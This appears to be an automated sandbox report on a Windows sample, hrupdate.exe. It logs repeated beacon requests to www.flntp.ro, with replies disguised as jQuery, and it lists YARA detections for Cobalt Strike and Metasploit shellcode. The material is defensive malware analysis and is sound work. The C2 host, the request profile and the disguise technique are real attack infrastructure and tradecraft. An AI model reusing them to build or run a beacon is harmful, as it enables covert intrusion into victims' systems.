                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:47 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:47 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              44 | 192.168.2.4 | 49888 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:49 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:49 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:49 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:49 UTC | 5607 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              45 | 192.168.2.4 | 49894 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:51 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:51 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:51 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:51 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              46 | 192.168.2.4 | 49901 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:53 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:54 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:53 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:54 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              47 | 192.168.2.4 | 49907 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:55 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:56 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:56 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:56 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              48 | 192.168.2.4 | 49913 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:41:57 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:58 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:58 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:58 UTC | 5649 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              49 | 192.168.2.4 | 49919 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:42:00 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:00 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:00 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:00 UTC | 5713 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              50 | 192.168.2.4 | 49926 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:42:02 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:03 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:02 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:03 UTC | 5671 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              51 | 192.168.2.4 | 49932 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:42:04 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:05 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:05 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:05 UTC | 5628 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              52 | 192.168.2.4 | 49938 | 3.79.209.76 | 443 | 7428 | C:\Users\user\Desktop\hrupdate.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-12-19 21:42:07 UTC | 485 | OUT | GET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:42:07 UTC | 235 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:42:07 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:42:07 UTC | 5692 | IN | Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Target ID:0
                                                              Start time:16:40:01
                                                              Start date:19/12/2024
                                                              Path:C:\Users\user\Desktop\hrupdate.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\hrupdate.exe"
                                                              Imagebase:0xb00000
                                                              File size:244'224 bytes
                                                              MD5 hash:03B14E9338A1C9E5551F9450207F6D84
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2210862324.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2873052676.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2325614801.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2258966363.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2166372998.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1920557369.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.1737677709.0000000001272000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2009759861.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2391768774.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2369855570.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
